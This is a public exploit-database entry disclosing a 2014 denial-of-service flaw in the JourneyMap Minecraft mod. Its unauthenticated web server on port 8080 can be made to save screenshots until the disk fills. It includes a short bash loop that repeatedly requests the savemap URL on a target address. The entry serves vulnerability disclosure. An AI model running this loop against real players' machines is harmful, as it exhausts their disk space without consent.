JourneyMap 5.0.0RC2 Ultimate Edition - Resource Consumption (Denial of Service)

EDB-ID:

35339

CVE:


Type:

dos

Platform:

Multiple

Published:

2014-11-24

# Exploit Title: JourneyMap Disk-space consumption exploit
# Date: 23Nov2014
# Exploit Author: CovertCodes
# Vendor Homepage: http://journeymap.techbrew.net/
# Software Link: http://journeymap.techbrew.net/download/
# Version: 5.0.0RC2 Ultimate Edition
# Tested on: Linux


  JourneyMap (http://journeymap.techbrew.net/) is a mapping mod for 
Minecraft.  It comes included with some modpacks, and is enabled by 
default in the popular Feed the Beast client.  JourneyMap opens a web 
server on the client which is configured to listen on port 8080.  When 
the client is running, a remote, unauthenticated user can have 
JourneyMap save a screenshot of the game to the hard drive by accessing 
a specific URL, consuming hard drive space.  Here's an example:

#!/bin/bash
   while true;
     do
     curl -o /dev/null 192.168.1.1:8080/action?type=savemap&mapType=day
   done

   This works even when the client has paused the game (by pressing 
escape.)  We include mapType=day because the software should refuse to 
save a screenshot if the client user is underground, and the game is set 
on hardcore mode.

   Accessing the URL and triggering a screenshot will display a message 
on the client's screen, which may somewhat lessen the severity of this 
exploit.  Further, it takes a long time to fill up disk using this 
technique.  JourneyMap allows depth and resolution to be specified in
the URL as well, though a few simple tests showed no change despite 
altering these parameters.  If one were able to increase the depth and
resolution of the image, the drive would fill up faster.

   Tested with JourneyMap 5.0.0RC2 Ultimate Edition, but presumed to 
work on other versions as well.